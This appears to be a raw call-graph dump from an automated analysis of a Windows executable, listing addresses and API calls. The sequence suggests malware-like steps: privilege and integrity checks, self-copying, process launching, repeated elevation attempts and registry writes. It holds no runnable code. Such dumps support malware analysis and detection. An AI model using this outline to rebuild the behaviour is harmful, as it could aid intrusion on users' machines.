428ac7 _malloc DecodePointer 16916->16918 16921 4266ea 16916->16921 16917->16924 16918->16916 16920 426707 GetLastError 16919->16920 16920->16924 16922 426d35 _write_string 66 API calls 16921->16922 16923 4266ef GetLastError 16922->16923 16923->16924 16924->16902 16928 42cc76 LeaveCriticalSection 16925->16928 16927 428612 16927->16874 16928->16927 16930 41f3f0 CoInitializeEx GdiplusStartup 16929->16930 16931 41f2f0 GdipGetImageEncodersSize 16930->16931 16932 41f315 16931->16932 16933 41f31e 16931->16933 16932->16460 16934 4258f2 _malloc 66 API calls 16933->16934 16935 41f325 16934->16935 16936 41f32e GdipGetImageEncoders 16935->16936 16939 41f38e 16935->16939 16937 41f388 16936->16937 16940 41f341 16936->16940 16938 4258b8 _free 66 API calls 16937->16938 16938->16939 16939->16460 16940->16937 16941 41f39b 16940->16941 16942 4258b8 _free 66 API calls 16941->16942 16943 41f3cc 16942->16943 16943->16460 16945 423410 16944->16945 16946 4233be 16944->16946 16945->16466 16947 4233c0 GetTickCount 16946->16947 17237 42671c 16947->17237 16950 4233cc 16951 42671c 66 API calls 16950->16951 17240 42672e 16950->17240 16952 4233eb Sleep 16951->16952 16952->16947 16953 423402 16952->16953 16953->16466 16955 425ab7 16954->16955 16957 425ab0 16954->16957 16956 426d35 _write_string 66 API calls 16955->16956 16962 425abc 16956->16962 16957->16955 16960 425aec 16957->16960 16958 426ce3 __commit 11 API calls 16959 41f584 16958->16959 16959->16469 16960->16959 16961 426d35 _write_string 66 API calls 16960->16961 16961->16962 16962->16958 16964 4204c5 16963->16964 16965 42046f SetFilePointer ReadFile SetFilePointer ReadFile FindCloseChangeNotification 16963->16965 16964->16478 16965->16478 16967 4204fa 16966->16967 16968 420508 AdjustTokenPrivileges FindCloseChangeNotification 16966->16968 16970 4256d3 __write_nolock 5 API calls 16967->16970 16969 4256d3 __write_nolock 5 API calls 16968->16969 16972 420550 16969->16972 16971 420504 16970->16971 16971->16480 16972->16480 16974 41fc57 SetLastError 16973->16974 16975 41fc6a GetCurrentProcess OpenProcessToken 16973->16975 16974->16483 16976 41fc82 GetLastError 16975->16976 16977 41fc8d GetTokenInformation 16975->16977 16985 41fd01 16976->16985 16978 41fcba LocalAlloc 16977->16978 16979 41fcac GetLastError 16977->16979 16980 41fcd3 GetTokenInformation 16978->16980 16981 41fccc GetLastError 16978->16981 16979->16978 16984 41fcb3 GetLastError 16979->16984 16986 41fce8 GetLastError 16980->16986 16987 41fcef GetSidSubAuthority 16980->16987 16981->16985 16982 41fd15 16988 41fd23 16982->16988 16989 41fd19 LocalFree 16982->16989 16983 41fd0b CloseHandle 16983->16982 16984->16985 16985->16982 16985->16983 16986->16985 16987->16985 16990 41fd29 SetLastError 16988->16990 16991 41fd3a 16988->16991 16989->16988 16990->16483 16991->16483 16993 41fd5d _memset __write_nolock 16992->16993 16994 4233b0 68 API calls 16993->16994 16995 41fd8f PathFindFileNameW 16994->16995 16996 414320 97 API calls 16995->16996 16997 41fdb9 CreateFileW GetLastError FindCloseChangeNotification 16996->16997 16998 41fea2 16997->16998 16999 41fdf2 16997->16999 17001 4256d3 __write_nolock 5 API calls 16998->17001 17000 414320 97 API calls 16999->17000 17002 41fe11 _memset 17000->17002 17003 41feb0 17001->17003 17004 41fe20 CopyFileW 17002->17004 17005 41fe40 CreateProcessW 17002->17005 17003->16493 17004->17002 17005->17004 17006 41fe88 17005->17006 17007 41fec0 69 API calls 17006->17007 17008 41fe8d 17007->17008 17009 4256d3 __write_nolock 5 API calls 17008->17009 17010 41fe9e 17009->17010 17010->16493 17012 41eb86 _memset 17011->17012 17013 41ebac GetEnvironmentVariableW 17012->17013 17014 41ece5 17013->17014 17015 41ebce 17013->17015 17016 4256d3 __write_nolock 5 API calls 17014->17016 17015->17014 17248 41eaf0 17015->17248 17018 41ecf4 17016->17018 17018->16492 17020 426210 __wsetenvp 66 API calls 17021 41ec18 17020->17021 17022 425aa2 __NMSG_WRITE 66 API calls 17021->17022 17023 41ec2e 17022->17023 17024 425aa2 __NMSG_WRITE 66 API calls 17023->17024 17025 41ec44 _memset 17024->17025 17026 41ec54 ShellExecuteExW 17025->17026 17027 41ecd7 CloseHandle 17026->17027 17028 41ecaa 17026->17028 17027->17014 17029 41ecb8 GetLastError 17028->17029 17030 41ecc1 Sleep ShellExecuteExW 17029->17030 17031 41ecd5 17029->17031 17030->17029 17030->17031 17031->17027 17033 412fe9 17032->17033 17047 413007 17032->17047 17034 413162 17033->17034 17035 412ff6 17033->17035 17038 4256d3 __write_nolock 5 API calls 17034->17038 17037 412ffd 17035->17037 17035->17047 17036 412fc0 6 API calls 17043 4130d8 17036->17043 17252 412c10 GetPEB 17037->17252 17041 413171 17038->17041 17039 413103 17045 4256d3 __write_nolock 5 API calls 17039->17045 17040 413002 17040->17039 17260 412ee0 17040->17260 17041->16498 17043->17040 17048 412fc0 6 API calls 17043->17048 17046 413113 17045->17046 17046->16498 17047->17036 17047->17040 17048->17040 17050 401482 _memset 17049->17050 17278 401230 17050->17278 17052 40148a 17303 4010c0 17052->17303 17054 4014d2 17055 4014e3 17054->17055 17318 4014f0 17054->17318 17354 4019c0 17055->17354 17061 41fff0 RegCreateKeyExA RegSetValueExW RegFlushKey RegCloseKey 17062 412fc0 6 API calls 17061->17062 17063 420060 17062->17063 17064 412fc0 6 API calls 17063->17064 17065 4200b2 RegFlushKey 17064->17065 17067 412fc0 6 API calls 17065->17067 17068 4200e2 17067->17068 17069 412fc0 6 API calls 17068->17069 17070 4200f6 17069->17070 17071 412fc0 6 API calls 17070->17071 17072 420142 RegFlushKey 17071->17072 17074 412fc0 6 API calls 17072->17074 17075 41f729 17074->17075 17075->16509 17077 41f1d7 _memset 17076->17077 17078 412fc0 6 API calls 17077->17078 17079 41f20b WaitForSingleObject CloseHandle CloseHandle Sleep 17078->17079 17081 41f25f 17079->17081 17081->16514 17084 41eef0 _memset 17082->17084 17083 4258f2 _malloc 66 API calls 17083->17084 17084->17083 17085 425a43 _strcpy_s 66 API calls 17084->17085 17086 41ef33 17084->17086 17085->17084 17087 4258f2 _malloc 66 API calls 17086->17087 17088 41ef3d 17087->17088 17089 4258f2 _malloc 66 API calls 17088->17089 17090 41ef4c 17089->17090 17091 4258f2 _malloc 66 API calls 17090->17091 17092 41ef5b 17091->17092 17093 4258f2 _malloc 66 API calls 17092->17093 17094 41ef6a 17093->17094 17095 4258f2 _malloc 66 API calls 17094->17095 17096 41ef79 17095->17096 17097 4258f2 _malloc 66 API calls 17096->17097 17098 41ef88 17097->17098 17099 4258f2 _malloc 66 API calls 17098->17099 17100 41ef97 17099->17100 17101 4258f2 _malloc 66 API calls 17100->17101 17102 41efa6 17101->17102 17104 41efea _memmove 17102->17104 18220 4128b0 17102->18220 17105 4128b0 6 API calls 17104->17105 17106 41f011 _memmove 17105->17106 17107 4128b0 6 API calls 17106->17107 17108 41f035 _memmove 17107->17108 17109 4128b0 6 API calls 17108->17109 17110 41f059 _memmove 17109->17110 17111 4128b0 6 API calls 17110->17111 17112 41f080 _memmove 17111->17112 17113 4128b0 6 API calls 17112->17113 17114 41f0a4 _memmove 17113->17114 17115 4128b0 6 API calls 17114->17115 17116 41f0c8 _memmove 17115->17116 17117 4128b0 6 API calls 17116->17117 17118 41f0ef _memmove 17117->17118 17119 4128b0 6 API calls 17118->17119 17120 41f116 17119->17120 17121 4258f2 _malloc 66 API calls 17120->17121 17122 41f127 _memmove 17121->17122 17123 4128b0 6 API calls 17122->17123 17124 41f149 17123->17124 17125 425d1d _strcat_s 66 API calls 17124->17125 17126 41f15f 17125->17126 17127 4258f2 _malloc 66 API calls 17126->17127 17128 41f170 _memmove 17127->17128 17129 4128b0 6 API calls 17128->17129 17130 41f195 17129->17130 17131 425d1d _strcat_s 66 API calls 17130->17131 17132 41f1aa 17131->17132 17133 420730 17132->17133 17134 425898 __strftime_l 97 API calls 17133->17134 17135 41f804 17134->17135 17135->16526 17137 42645b 17136->17137 17138 426448 17136->17138 18300 42637d 17137->18300 17139 426d35 _write_string 66 API calls 17138->17139 17141 42644d 17139->17141 17142 426ce3 __commit 11 API calls 17141->17142 17143 41f903 17142->17143 17143->16536 17146 426482 17143->17146 17144 42646b 17144->17143 17145 426d35 _write_string 66 API calls 17144->17145 17145->17143 17147 42648e __commit 17146->17147 17148 4264a1 17147->17148 17150 4264c5 17147->17150 17149 426d35 _write_string 66 API calls 17148->17149 17151 4264a6 17149->17151 18698 428bc6 17150->18698 17153 426ce3 __commit 11 API calls 17151->17153 17158 4264b1 __commit 17153->17158 17155 42b437 __fflush_nolock 66 API calls 17165 4264de 17155->17165 17157 428ca4 __stbuf 66 API calls 17159 426552 17157->17159 17158->16532 17160 426d7e __output_l 102 API calls 17159->17160 17161 426562 17160->17161 17163 428d40 __ftbuf 97 API calls 17161->17163 17162 426d35 _write_string 66 API calls 17166 426538 17162->17166 17164 42656c 17163->17164 18704 426584 17164->18704 17165->17162 17168 426543 17165->17168 17167 426ce3 __commit 11 API calls 17166->17167 17167->17168 17168->17157 17168->17164 17170 426607 __commit 17169->17170 17171 426619 17170->17171 17172 42662e 17170->17172 17173 426d35 _write_string 66 API calls 17171->17173 17175 428bc6 __lock_file 67 API calls 17172->17175 17180 426629 __commit 17172->17180 17174 42661e 17173->17174 17177 426ce3 __commit 11 API calls 17174->17177 17176 426647 17175->17176 18707 42658e 17176->18707 17177->17180 17180->16536 17183 4205ac CreateCompatibleDC 17182->17183 17184 4205fd ReleaseDC 17182->17184 17185 4205fa 17183->17185 17186 4205b9 SelectObject SetBkMode SetTextColor 17183->17186 17187 420620 17184->17187 17188 42060c 17184->17188 17185->17184 18757 420180 7 API calls 17186->18757 17187->16533 17188->17187 17190 420610 DeleteObject 17188->17190 17190->16533 17191 4205e1 SelectObject DeleteDC 17191->17185 17193 425cfd __strftime_l 97 API calls 17192->17193 17194 41433a 17193->17194 17195 41fb80 CreateFileW 17194->17195 17196 41fa39 17195->17196 17197 41fbac WriteFile CloseHandle 17195->17197 17199 420750 17196->17199 17197->17196 17200 420792 17199->17200 17201 42081f 17200->17201 17202 412fc0 6 API calls 17200->17202 17203 412ee0 6 API calls 17201->17203 17204 420808 17202->17204 17205 420830 17203->17205 17204->17201 17208 412fc0 6 API calls 17204->17208 17206 4256d3 __write_nolock 5 API calls 17205->17206 17207 41fa4a 17206->17207 17207->16549 17208->17201 17210 41fa7a 17209->17210 17211 41fc0c WriteFile CloseHandle 17209->17211 17210->16553 17211->17210 17243 42a905 17237->17243 17241 42a905 __getptd 66 API calls 17240->17241 17242 426733 17241->17242 17242->16950 17244 42a88c __getptd_noexit 66 API calls 17243->17244 17245 42a90d 17244->17245 17246 426726 17245->17246 17247 42888c __amsg_exit 66 API calls 17245->17247 17246->16950 17247->17246 17249 41eafd 17248->17249 17250 41eb2c 17249->17250 17251 41eb0e _vsnwprintf 17249->17251 17250->17014 17250->17020 17251->17250 17253 412d62 17252->17253 17256 412c5f 17252->17256 17254 4256d3 __write_nolock 5 API calls 17253->17254 17255 412d71 17254->17255 17255->17040 17256->17253 17257 412d75 17256->17257 17258 4256d3 __write_nolock 5 API calls 17257->17258 17259 412d85 17258->17259 17259->17040 17262 412f0b 17260->17262 17261 412f73 17261->17039 17262->17261 17262->17262 17264 412d90 17262->17264 17265 412db3 17264->17265 17266 412dc6 17264->17266 17267 4256d3 __write_nolock 5 API calls 17265->17267 17266->17265 17269 412e14 17266->17269 17270 412e01 17266->17270 17268 412dc2 17267->17268 17268->17261 17269->17265 17273 412e1e 17269->17273 17271 4256d3 __write_nolock 5 API calls 17270->17271 17272 412e10 17271->17272 17272->17261 17274 412fc0 6 API calls 17273->17274 17275 412ebe 17274->17275 17276 4256d3 __write_nolock 5 API calls 17275->17276 17277 412ece 17276->17277 17277->17261 17360 42c770 17278->17360 17281 401353 RegCreateKeyExW RegQueryValueExW 17283 4013da 17281->17283 17292 401390 RegSetValueExW RegFlushKey 17281->17292 17282 401298 RegQueryValueExW 17282->17281 17284 4012ba 17282->17284 17286 401cd0 97 API calls 17283->17286 17362 401cd0 17284->17362 17289 40140e 17286->17289 17291 401cd0 97 API calls 17289->17291 17290 401cd0 97 API calls 17293 401321 17290->17293 17294 401441 17291->17294 17292->17283 17296 425aa2 __NMSG_WRITE 66 API calls 17293->17296 17295 425aa2 __NMSG_WRITE 66 API calls 17294->17295 17298 401451 RegCloseKey 17295->17298 17297 401331 RegCloseKey 17296->17297 17299 4256d3 __write_nolock 5 API calls 17297->17299 17300 4256d3 __write_nolock 5 API calls 17298->17300 17301 40134f 17299->17301 17302 40146c 17300->17302 17301->17052 17302->17052 17304 4010ea _memset 17303->17304 17592 401cb0 17304->17592 17309 401209 17314 4256d3 __write_nolock 5 API calls 17309->17314 17310 4011f9 17313 4256d3 __write_nolock 5 API calls 17310->17313 17316 401205 17313->17316 17317 401222 17314->17317 17315 40116e RegCreateKeyExA RegQueryValueExA RegCloseKey 17315->17309 17315->17310 17316->17054 17317->17054 17319 401534 _memset 17318->17319 17660 420970 17319->17660 17321 40164a 17323 401699 17321->17323 17668 419f60 17321->17668 17326 4016e9 17323->17326 17674 415650 17323->17674 17325 419f60 _aullshr 17328 40178b 17325->17328 17326->17325 17326->17328 17327 4017ea 17680 414960 17327->17680 17328->17327 17331 415650 _aullshr 17328->17331 17330 40180a 17332 4258b8 _free 66 API calls 17330->17332 17331->17327 17333 40181f 17332->17333 17334 420970 5 API calls 17333->17334 17335 401889 _memset 17334->17335 17336 420970 5 API calls 17335->17336 17337 401901 17336->17337 17338 420970 5 API calls 17337->17338 17339 401914 17338->17339 17702 401ab0 17339->17702 17341 40197b 17706 425986 17341->17706 17343 40198d 17723 425dbb GetSystemTimeAsFileTime 17343->17723 17345 401997 17346 4256d3 __write_nolock 5 API calls 17345->17346 17347 4014de 17346->17347 17348 401000 17347->17348 17349 40102e _memset 17348->17349 18191 401c90 17349->18191 17352 4256d3 __write_nolock 5 API calls 17353 4010b8 17352->17353 17353->17055 17355 4019f9 17354->17355 18194 4147a0 17355->18194 17357 401a57 17358 4256d3 __write_nolock 5 API calls 17357->17358 17359 4014e8 17358->17359 17359->17061 17361 401262 RegCreateKeyExW 17360->17361 17361->17281 17361->17282 17365 425cfd 17362->17365 17368 425c0d 17365->17368 17367 4012ee 17367->17290 17369 425c18 17368->17369 17370 425c2d 17368->17370 17371 426d35 _write_string 66 API calls 17369->17371 17373 425c3e 17370->17373 17375 425c65 17370->17375 17372 425c1d 17371->17372 17374 426ce3 __commit 11 API calls 17372->17374 17376 426d35 _write_string 66 API calls 17373->17376 17398 425c43 17373->17398 17377 425c28 17374->17377 17379 426d35 _write_string 66 API calls 17375->17379 17378 425c5a 17376->17378 17377->17367 17381 426ce3 __commit 11 API calls 17378->17381 17380 425c6a 17379->17380 17382 425ca1 17380->17382 17383 425c77 17380->17383 17381->17398 17385 425b17 __vswprintf_helper 97 API calls 17382->17385 17399 425b17 17383->17399 17387 425caf 17385->17387 17388 425cd7 17387->17388 17391 425cc4 17387->17391 17394 426d35 _write_string 66 API calls 17388->17394 17388->17398 17389 425c8e 17390 426d35 _write_string 66 API calls 17389->17390 17392 425c93 17390->17392 17393 426d35 _write_string 66 API calls 17391->17393 17396 426d35 _write_string 66 API calls 17392->17396 17392->17398 17395 425cc9 17393->17395 17394->17378 17397 426d35 _write_string 66 API calls 17395->17397 17395->17398 17396->17398 17397->17398 17398->17367 17400 425b35 17399->17400 17401 425b4d 17399->17401 17402 426d35 _write_string 66 API calls 17400->17402 17403 425b5c 17401->17403 17409 425b74 17401->17409 17404 425b3a 17402->17404 17405 426d35 _write_string 66 API calls 17403->17405 17406 426ce3 __commit 11 API calls 17404->17406 17407 425b61 17405->17407 17412 425b45 17406->17412 17408 426ce3 __commit 11 API calls 17407->17408 17408->17412 17410 425bbb 17409->17410 17409->17412 17414 4269f5 17409->17414 17410->17412 17413 4269f5 __flsbuf 97 API calls 17410->17413 17412->17388 17412->17389 17413->17412 17435 42b437 17414->17435 17416 426a05 17417 426a10 17416->17417 17418 426a27 17416->17418 17419 426d35 _write_string 66 API calls 17417->17419 17420 426a2b 17418->17420 17428 426a38 __flsbuf 17418->17428 17422 426a15 17419->17422 17421 426d35 _write_string 66 API calls 17420->17421 17421->17422 17422->17410 17423 426b28 17425 42c5f4 __write 97 API calls 17423->17425 17424 426aa8 17426 426abf 17424->17426 17430 426adc 17424->17430 17425->17422 17454 42c5f4 17426->17454 17428->17422 17431 426a8e 17428->17431 17434 426a99 17428->17434 17442 42c711 17428->17442 17430->17422 17479 42be0d 17430->17479 17431->17434 17451 42c6c8 17431->17451 17434->17423 17434->17424 17436 42b443 17435->17436 17437 42b458 17435->17437 17438 426d35 _write_string 66 API calls 17436->17438 17437->17416 17439 42b448 17438->17439 17440 426ce3 __commit 11 API calls 17439->17440 17441 42b453 17440->17441 17441->17416 17443 42c71e 17442->17443 17444 42c72d 17442->17444 17445 426d35 _write_string 66 API calls 17443->17445 17446 42c74b 17444->17446 17447 426d35 _write_string 66 API calls 17444->17447 17448 42c723 17445->17448 17446->17431 17449 42c73e 17447->17449 17448->17431 17450 426ce3 __commit 11 API calls 17449->17450 17450->17448 17452 42c80d __malloc_crt 66 API calls 17451->17452 17453 42c6dd 17452->17453 17453->17434 17455 42c600 __commit 17454->17455 17456 42c623 17455->17456 17457 42c608 17455->17457 17458 42c62f 17456->17458 17463 42c669 17456->17463 17504 426d48 17457->17504 17460 426d48 __set_osfhnd 66 API calls 17458->17460 17462 42c634 17460->17462 17465 426d35 _write_string 66 API calls 17462->17465 17507 42f0a7 17463->17507 17464 426d35 _write_string 66 API calls 17476 42c615 __commit 17464->17476 17467 42c63c 17465->17467 17469 426ce3 __commit 11 API calls 17467->17469 17468 42c66f 17470 42c691 17468->17470 17471 42c67d 17468->17471 17469->17476 17473 426d35 _write_string 66 API calls 17470->17473 17517 42bef7 17471->17517 17475 42c696 17473->17475 17474 42c689 17576 42c6c0 17474->17576 17477 426d48 __set_osfhnd 66 API calls 17475->17477 17476->17422 17477->17474 17480 42be19 __commit 17479->17480 17481 42be46 17480->17481 17482 42be2a 17480->17482 17483 42be52 17481->17483 17488 42be8c 17481->17488 17484 426d48 __set_osfhnd 66 API calls 17482->17484 17485 426d48 __set_osfhnd 66 API calls 17483->17485 17486 42be2f 17484->17486 17487 42be57 17485->17487 17489 426d35 _write_string 66 API calls 17486->17489 17490 426d35 _write_string 66 API calls 17487->17490 17491 42f0a7 ___lock_fhandle 68 API calls 17488->17491 17501 42be37 __commit 17489->17501 17492 42be5f 17490->17492 17493 42be92 17491->17493 17494 426ce3 __commit 11 API calls 17492->17494 17495 42bea0 17493->17495 17496 42bebc 17493->17496 17494->17501 17579 42bd88 17495->17579 17497 426d35 _write_string 66 API calls 17496->17497 17500 42bec1 17497->17500 17499 42beb1 17589 42beed 17499->17589 17502 426d48 __set_osfhnd 66 API calls 17500->17502 17501->17422 17502->17499 17505 42a88c __getptd_noexit 66 API calls 17504->17505 17506 426d4d 17505->17506 17506->17464 17508 42f0b3 __commit 17507->17508 17509 42f10d 17508->17509 17512 42cd4f __lock 66 API calls 17508->17512 17510 42f112 EnterCriticalSection 17509->17510 17511 42f12f __commit 17509->17511 17510->17511 17511->17468 17513 42f0df 17512->17513 17514 42f0e8 InitializeCriticalSectionAndSpinCount 17513->17514 17516 42f0fb 17513->17516 17514->17516 17515 42f13d ___lock_fhandle LeaveCriticalSection 17515->17509 17516->17515 17518 42bf06 __write_nolock 17517->17518 17519 42bf31 17518->17519 17520 42bf5b 17518->17520 17521 42bf3c 17518->17521 17522 4256d3 __write_nolock 5 API calls 17519->17522 17525 42bfb7 17520->17525 17526 42bf9a 17520->17526 17523 426d48 __set_osfhnd 66 API calls 17521->17523 17524 42c5f2 17522->17524 17527 42bf41 17523->17527 17524->17474 17529 42bfca 17525->17529 17533 42bd88 __lseeki64_nolock 68 API calls 17525->17533 17528 426d48 __set_osfhnd 66 API calls 17526->17528 17530 426d35 _write_string 66 API calls 17527->17530 17532 42bf9f 17528->17532 17531 42c711 __flsbuf 66 API calls 17529->17531 17534 42bf48 17530->17534 17535 42bfd3 17531->17535 17536 426d35 _write_string 66 API calls 17532->17536 17533->17529 17537 426ce3 __commit 11 API calls 17534->17537 17538 42c275 17535->17538 17543 42a905 __getptd 66 API calls 17535->17543 17539 42bfa7 17536->17539 17537->17519 17541 42c284 17538->17541 17542 42c525 WriteFile 17538->17542 17540 426ce3 __commit 11 API calls 17539->17540 17540->17519 17544 42c33f 17541->17544 17556 42c297 17541->17556 17546 42c257 17542->17546 17547 42c558 GetLastError 17542->17547 17545 42bfee GetConsoleMode 17543->17545 17555 42c34c 17544->17555 17566 42c419 17544->17566 17545->17538 17549 42c017 17545->17549 17546->17519 17548 42c5a3 17546->17548 17553 42c576 17546->17553 17547->17546 17548->17519 17552 426d35 _write_string 66 API calls 17548->17552 17549->17538 17550 42c027 GetConsoleCP 17549->17550 17550->17546 17574 42c04a 17550->17574 17551 42c2e1 WriteFile 17551->17547 17551->17556 17557 42c5c6 17552->17557 17559 42c581 17553->17559 17560 42c595 17553->17560 17554 42c3bb WriteFile 17554->17547 17554->17555 17555->17546 17555->17548 17555->17554 17556->17546 17556->17548 17556->17551 17562 426d48 __set_osfhnd 66 API calls 17557->17562 17558 42c48a WideCharToMultiByte 17558->17547 17564 42c4c1 WriteFile 17558->17564 17563 426d35 _write_string 66 API calls 17559->17563 17561 426d5b __dosmaperr 66 API calls 17560->17561 17561->17519 17562->17519 17567 42c586 17563->17567 17565 42c4f8 GetLastError 17564->17565 17564->17566 17565->17566 17566->17546 17566->17548 17566->17558 17566->17564 17569 426d48 __set_osfhnd 66 API calls 17567->17569 17568 42cb25 __write_nolock 76 API calls 17568->17574 17569->17519 17570 42f3df WriteConsoleW CreateFileW __write_nolock 17570->17574 17571 42c0f6 WideCharToMultiByte 17571->17546 17573 42c127 WriteFile 17571->17573 17572 42d760 78 API calls __fassign 17572->17574 17573->17547 17573->17574 17574->17546 17574->17547 17574->17568 17574->17570 17574->17571 17574->17572 17575 42c17b WriteFile 17574->17575 17575->17547 17575->17574 17577 42f146 __unlock_fhandle LeaveCriticalSection 17576->17577 17578 42c6c6 17577->17578 17578->17476 17580 42f03e __commit 66 API calls 17579->17580 17581 42bda6 17580->17581 17582 42bdae 17581->17582 17583 42bdbf SetFilePointer 17581->17583 17585 426d35 _write_string 66 API calls 17582->17585 17584 42bdd7 GetLastError 17583->17584 17586 42bdb3 17583->17586 17584->17586 17587 42bde1 17584->17587 17585->17586 17586->17499 17588 426d5b __dosmaperr 66 API calls 17587->17588 17588->17586 17590 42f146 __unlock_fhandle LeaveCriticalSection 17589->17590 17591 42bef5 17590->17591 17591->17501 17613 425898 17592->17613 17595 425a43 17596 425a51 17595->17596 17597 425a58 17595->17597 17596->17597 17601 425a76 17596->17601 17598 426d35 _write_string 66 API calls 17597->17598 17599 425a5d 17598->17599 17600 426ce3 __commit 11 API calls 17599->17600 17602 401156 17600->17602 17601->17602 17603 426d35 _write_string 66 API calls 17601->17603 17604 425d1d 17602->17604 17603->17599 17605 425d32 17604->17605 17607 425d2b 17604->17607 17606 426d35 _write_string 66 API calls 17605->17606 17612 425d37 17606->17612 17607->17605 17610 425d60 17607->17610 17608 426ce3 __commit 11 API calls 17609 425d41 17608->17609 17609->17315 17610->17609 17611 426d35 _write_string 66 API calls 17610->17611 17611->17612 17612->17608 17616 4257ac 17613->17616 17615 401137 17615->17315 17615->17595 17617 4257b7 17616->17617 17619 4257cc 17616->17619 17618 426d35 _write_string 66 API calls 17617->17618 17621 4257bc 17618->17621 17620 4257dd 17619->17620 17622 425804 17619->17622 17623 426d35 _write_string 66 API calls 17620->17623 17646 4257e2 17620->17646 17624 426ce3 __commit 11 API calls 17621->17624 17626 426d35 _write_string 66 API calls 17622->17626 17625 4257f9 17623->17625 17627 4257c7 17624->17627 17629 426ce3 __commit 11 API calls 17625->17629 17628 425809 17626->17628 17627->17615 17630 425840 17628->17630 17631 425816 17628->17631 17629->17646 17632 4256e2 __vsnprintf_helper 97 API calls 17630->17632 17647 4256e2 17631->17647 17634 42584e 17632->17634 17636 425874 17634->17636 17638 425861 17634->17638 17643 426d35 _write_string 66 API calls 17636->17643 17636->17646 17637 42582d 17639 426d35 _write_string 66 API calls 17637->17639 17640 426d35 _write_string 66 API calls 17638->17640 17641 425832 17639->17641 17642 425866 17640->17642 17644 426d35 _write_string 66 API calls 17641->17644 17641->17646 17645 426d35 _write_string 66 API calls 17642->17645 17642->17646 17643->17625 17644->17646 17645->17646 17646->17615 17648 425700 17647->17648 17649 425718 17647->17649 17650 426d35 _write_string 66 API calls 17648->17650 17652 425727 17649->17652 17656 42573c 17649->17656 17651 425705 17650->17651 17653 426ce3 __commit 11 API calls 17651->17653 17654 426d35 _write_string 66 API calls 17652->17654 17658 425710 17653->17658 17655 42572c 17654->17655 17657 426ce3 __commit 11 API calls 17655->17657 17656->17658 17659 4269f5 __flsbuf 97 API calls 17656->17659 17657->17658 17658->17636 17658->17637 17659->17658 17661 42098e _memset 17660->17661 17725 420a20 17661->17725 17663 4209f9 17732 420b10 17663->17732 17665 420a07 17666 4256d3 __write_nolock 5 API calls 17665->17666 17667 420a16 17666->17667 17667->17321 17669 419fbf _memset _memmove 17668->17669 17672 419fc8 17668->17672 17669->17323 17670 41a46c 17670->17669 17671 419d70 _aullshr 17670->17671 17671->17669 17672->17669 17672->17670 17742 419d70 17672->17742 17676 415672 _memset 17674->17676 17675 415684 17675->17326 17676->17675 17750 40d950 17676->17750 17678 41579c _memset 17678->17675 17679 40d950 _aullshr 17678->17679 17679->17675 17681 4149b9 17680->17681 17688 4149f0 17680->17688 17754 414d40 17681->17754 17682 4256d3 __write_nolock 5 API calls 17684 414a92 17682->17684 17684->17330 17685 4149be 17685->17688 17763 414bd0 17685->17763 17687 4149d3 17687->17688 17767 41b240 17687->17767 17688->17682 17690 414a12 17691 4258f2 _malloc 66 API calls 17690->17691 17692 414a24 _memset 17691->17692 17693 41b240 _aullshr 17692->17693 17694 414a4f 17693->17694 17698 414a5d 17694->17698 17772 41bf80 17694->17772 17695 4258b8 _free 66 API calls 17695->17688 17697 414af0 17697->17698 17699 414afb 17697->17699 17698->17695 17700 4256d3 __write_nolock 5 API calls 17699->17700 17701 414b0a 17700->17701 17701->17330 17704 401ac0 17702->17704 17703 4258f2 _malloc 66 API calls 17705 401b25 _memset 17703->17705 17704->17703 17705->17341 17707 425992 __commit 17706->17707 17708 4259a0 17707->17708 17709 4259b5 __flsbuf 17707->17709 17710 426d35 _write_string 66 API calls 17708->17710 17822 428c07 17709->17822 17711 4259a5 17710->17711 17713 426ce3 __commit 11 API calls 17711->17713 17715 4259b0 __commit 17713->17715 17714 4259c7 __flsbuf 17827 428ca4 17714->17827 17715->17343 17717 4259d9 __flsbuf 17834 426d7e 17717->17834 17719 4259f1 __flsbuf 17855 428d40 17719->17855 17724 425deb __aulldiv 17723->17724 17724->17345 17726 420a38 _memmove 17725->17726 17728 420ada _memmove 17725->17728 17729 420a65 _memmove 17726->17729 17731 420aa3 _memset 17726->17731 17738 420df0 17726->17738 17727 420df0 5 API calls 17727->17728 17728->17663 17729->17663 17731->17727 17731->17728 17733 420b4b _memset 17732->17733 17734 420b28 _memset 17732->17734 17735 420df0 5 API calls 17733->17735 17736 420df0 5 API calls 17734->17736 17737 420ba5 _memset 17735->17737 17736->17733 17737->17665 17739 420e16 17738->17739 17740 4256d3 __write_nolock 5 API calls 17739->17740 17741 421de6 17740->17741 17741->17731 17743 419d8f 17742->17743 17745 419e0b 17742->17745 17743->17672 17745->17743 17746 40dbd0 17745->17746 17747 40dbd7 17746->17747 17748 40dbdb 17746->17748 17747->17745 17748->17747 17749 40dbfa _aullshr 17748->17749 17749->17745 17751 40d969 17750->17751 17752 40d9c0 _aullshr 17751->17752 17753 40d9d9 17751->17753 17752->17751 17752->17753 17753->17678 17756 414d4e 17754->17756 17755 414db6 17755->17685 17756->17755 17780 4113f0 17756->17780 17758 414e02 17759 4113f0 2 API calls 17758->17759 17760 414e10 17759->17760 17762 414e51 17760->17762 17786 418cd0 17760->17786 17762->17685 17765 414bd8 17763->17765 17764 414bf9 17764->17687 17765->17764 17797 418ba0 17765->17797 17768 41b251 17767->17768 17769 415650 _aullshr 17768->17769 17770 41b256 17768->17770 17771 41b27a 17769->17771 17770->17690 17771->17690 17773 41bfd9 17772->17773 17778 41bff1 17772->17778 17774 4256d3 __write_nolock 5 API calls 17773->17774 17775 41bfea 17774->17775 17775->17697 17776 4256d3 __write_nolock 5 API calls 17777 41c36d 17776->17777 17777->17697 17778->17773 17779 41c02f _memmove 17778->17779 17779->17776 17781 411405 17780->17781 17785 411440 17780->17785 17782 41141a isxdigit 17781->17782 17781->17785 17783 41142d 17782->17783 17782->17785 17784 411430 isxdigit 17783->17784 17784->17784 17784->17785 17785->17758 17787 418ceb 17786->17787 17791 418dbd 17786->17791 17787->17791 17792 419aa0 17787->17792 17789 418d7e 17790 419aa0 _aullshr 17789->17790 17789->17791 17790->17791 17791->17755 17793 419ab9 17792->17793 17794 419aea 17793->17794 17795 419f60 _aullshr 17793->17795 17794->17789 17796 419ae1 17795->17796 17796->17789 17798 418c69 17797->17798 17799 418bbc 17797->17799 17798->17764 17799->17798 17802 418c35 17799->17802 17803 4117b0 17799->17803 17801 419aa0 _aullshr 17801->17798 17802->17798 17802->17801 17804 4117d1 17803->17804 17807 411807 17803->17807 17805 40dbd0 _aullshr 17804->17805 17804->17807 17806 411846 17805->17806 17808 40dbd0 _aullshr 17806->17808 17811 4118d0 17806->17811 17807->17799 17810 41185b 17808->17810 17809 411790 GetSystemTimeAsFileTime 17809->17811 17810->17811 17813 41185f 